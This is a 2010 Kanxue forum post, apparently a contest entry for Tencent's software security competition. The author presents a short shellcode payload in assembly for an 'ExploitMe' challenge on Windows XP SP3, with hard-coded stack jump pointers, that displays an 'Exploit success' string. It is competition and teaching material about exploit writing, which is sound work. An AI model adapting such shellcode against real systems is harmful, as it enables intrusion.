首页
社区
课程
招聘
问答 CTF 排行榜 知识库 工具下载 峰会 看雪商城 证书查询
  1. 社区
  2. 7)腾讯公司2010软件安全竞赛
    3. 发新帖
[原创]交卷,还是提交个稳定的版本吧
发表于: 2010-10-19 19:28 3195

[原创]交卷,还是提交个稳定的版本吧

rickywong 活跃值
2010-10-19 19:28
3195
太多硬编码不能行,过度追求字节数而不稳定这就违背了信息安全的主旨了,所以提交的这个答卷除了堆栈跳转不得不硬编码之外,其他都是偏移量,完全稳定,在Win XP SP3下通过
堆栈基址是 0x00140000,如果是在堆栈基址是0x00130000的机器调试,需要修改两个跳转指针

1
2
3
4
5
6
7
8
dd xx xx xx 00 ;指针2
5a                      pop edx
6a 00                       push 0
ff 72 57                    push dword ptr [edx + 57] ;"ExploitMe"
83 c2 60                    add edx, 0x60
ff d2                       call edx
dd 45 00 78 00 70 00 6c 00 6f 00 69 00 74 00 20 00 73 00 75 00 63 00 63 00 65 00 73 00 73 00 00 00 ;字符串
dd xx xx xx 00 ;指针1


共31个非零字节

[招生]科锐逆向工程师培训(2025年3月11日实地,远程教学同时开班, 第52期)!

上传的附件:
收藏
免费
支持
分享
最新回复 (0)
游客
登录 | 注册 方可回帖
回帖 表情 雪币赚取及消费
高级回复
返回

账号登录
验证码登录

忘记密码?
没有账号?立即免费注册
我已同意 《看雪服务条款》 《看雪课程免责声明》 《看雪隐私政策》